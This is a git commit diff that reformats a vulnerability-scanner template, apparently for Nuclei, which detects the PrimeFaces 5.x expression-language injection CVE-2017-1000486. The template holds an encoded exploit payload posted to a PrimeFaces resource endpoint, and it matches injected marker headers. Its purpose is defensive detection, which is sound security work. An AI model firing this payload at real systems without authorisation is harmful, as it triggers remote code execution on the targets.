Update CVE-2017-1000486.yaml file to pass Checks

patch-1
Moritz 2021-05-27 11:38:23 +02:00
parent 24bcb23857
commit 0c0eaf114c
1 changed files with 14 additions and 17 deletions

View File

@ -1,7 +1,7 @@
id: CVE-2017-1000486
info:
name: CVE-2017-1000486
name: CVE-2017-1000486
author: Moritz Nentwig
severity: low
description: Detection for PrimeFaces 5.x EL Injection (CVE-2017-1000486), a RCE vulnerability that can be used to gain Remote Code Execution on a target.
@ -13,22 +13,6 @@ requests:
body: "pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D"
headers:
Content-Type: application/x-www-form-urlencoded
matchers:
- type: word
words:CVE-2017-1000486
- 'MOGWAILABS'
- 'CHECKCHECK'
part: header
redirect: true
- method: POST
path:
- "{{BaseURL}}/javax.faces.resource/dynamiccontent.properties.jsf"
body: "pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D"
headers:
Content-Type: application/x-www-form-urlencoded
matchers:
- type: word
words:
@ -36,3 +20,16 @@ requests:
- 'CHECKCHECK'
part: header
redirect: true
- method: POST
path:
- "{{BaseURL}}/javax.faces.resource/dynamiccontent.properties.jsf"
body: "pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D"
headers:
Content-Type: application/x-www-form-urlencoded
matchers:
- type: word
words:
- 'MOGWAILABS'
- 'CHECKCHECK'
part: header
redirect: true